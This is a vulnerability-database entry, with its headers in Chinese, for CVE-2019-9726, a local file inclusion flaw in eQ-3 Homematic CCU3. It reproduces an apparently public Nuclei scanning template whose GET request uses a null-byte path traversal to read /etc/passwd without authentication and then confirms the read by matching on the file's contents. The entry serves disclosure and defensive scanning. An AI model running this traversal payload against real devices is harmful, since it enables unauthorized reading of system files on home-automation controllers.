CVE-2019-9726: Homematic CCU3 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Homematic CCU3 | POC: 已公开

漏洞描述

eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.

PoC代码[已公开]

id: CVE-2019-9726

info:
  name: Homematic CCU3 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor.
  reference:
    - https://atomic111.github.io/article/homematic-ccu3-fileread
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9726
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-9726
    cwe-id: CWE-22
    epss-score: 0.58772
    epss-percentile: 0.98115
    cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: eq-3
    product: ccu3_firmware
  tags: cve2019,cve,homematic,lfi,eq-3,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/.%00./.%00./etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "bin:.*:0:0:"
        condition: or

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fc03184b7e19f2e1e2c16fce18bf43ed7a1ea56f51c40c7c5e2208fbbe54ad890221009f6a6415e3e4452cafc3ae7bf0e99e41eaf1a597896160c5b66ad0cefcb95847:922c64590222798bb761d5b6d8e72950

相关漏洞推荐